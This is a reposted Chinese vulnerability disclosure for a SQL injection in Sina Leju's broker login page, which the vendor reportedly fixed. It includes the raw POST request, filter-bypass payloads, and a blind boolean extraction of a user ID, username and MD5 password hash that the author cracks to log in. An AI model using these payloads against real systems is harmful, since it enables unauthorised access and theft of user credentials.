神刀安全网

漏洞标题: 新浪乐居之看我如何绕过过滤注入(可dump经纪人用户库)

漏洞详情

披露状态:

2016-04-05: 细节已通知厂商并且等待厂商处理中
2016-04-06: 厂商已经确认,细节仅向厂商公开
2016-04-06: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

rt

详细说明:

http://j.m.leju.com/login

经纪人后台登录口

code 区域
POST /login/jjhcheck HTTP/1.1
Host: j.m.leju.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Referer: http://j.m.leju.com/login
Content-Length: 133
Cookie: PHPSESSID=idtt1n80ik24sqk8pkpdpi1ia1;
Connection: keep-alive

username=1&password=1&city=sh

username参数存在注入点

过滤的比较凶狠 = < > from || && like in等都过滤了

漏洞标题:  新浪乐居之看我如何绕过过滤注入(可dump经纪人用户库)

被检测到了

接着

username=1'or'1&password=1&city=sh

表示从所有用户当中找有没有密码为1的用户 结果成功了

接着找出用户密码字段

code 区域
username=1' or 1 or uid and'1&password=1&city=sh
username=1' or 1 or username and'1&password=1&city=sh
username=1' or 1 or password and'1&password=1&city=sh

均返回

code 区域
{"status":1,"msg":null}

字段不存在则返回

code 区域
{"status":1,"msg":"/u7528/u6237/u540d/u4e0d/u5b58/u5728"}

接着确定一个uid

code 区域
username=1'  or 1 and uid between 9995 and 9995 and'1&password=1&city=sh

返回正常 表示存在uid为9995的用户

接着同理注出用户名和密码

漏洞标题:  新浪乐居之看我如何绕过过滤注入(可dump经纪人用户库)

漏洞标题:  新浪乐居之看我如何绕过过滤注入(可dump经纪人用户库)

106正常107异常所以第一位ascii码为106

注出用户名后接着注出密码

漏洞标题:  新浪乐居之看我如何绕过过滤注入(可dump经纪人用户库)

解密md5后成功登录

漏洞标题:  新浪乐居之看我如何绕过过滤注入(可dump经纪人用户库)

运气不好一个空号

写个脚本轻轻松松dump所有用户

漏洞证明:

已证明

修复方案:

过滤

版权声明:转载请注明来源 蓝冰@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 新浪乐居之看我如何绕过过滤注入(可dump经纪人用户库)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮